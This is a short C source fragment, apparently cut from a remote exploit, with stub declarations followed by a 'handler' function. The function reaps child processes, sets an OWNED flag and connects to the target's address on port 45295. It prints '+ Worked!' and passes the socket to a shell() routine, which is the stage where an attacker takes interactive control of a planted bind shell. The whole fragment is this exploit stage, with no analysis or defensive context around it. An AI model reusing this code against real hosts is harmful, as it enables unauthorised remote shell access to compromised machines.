
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int sin_addr; } ;


 int AF_INET ;
 int Connect (int,char*,int,int) ;
 int OWNED ;
 int SOCK_STREAM ;
 TYPE_1__ addr1 ;
 int* childs ;
 int close (int) ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 scalar_t__ inet_ntoa (int ) ;
 int shell (int) ;
 int socket (int ,int ,int) ;
 int stdout ;
 int waitpid (int,int *,int ) ;

void handler()
{
        int sock = 0;
        int i = 0;
        OWNED = 1;

        for (i = 0; i < 100; i++)
                if (childs[i] != 0xffffffff) waitpid(childs[i], ((void*)0), 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                close(sock);
                exit(1);
        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                fprintf(stdout, "+ Worked!\n"
                                "--------------------------------------------------------------\n");
                shell(sock);
                close(sock);
        }


}
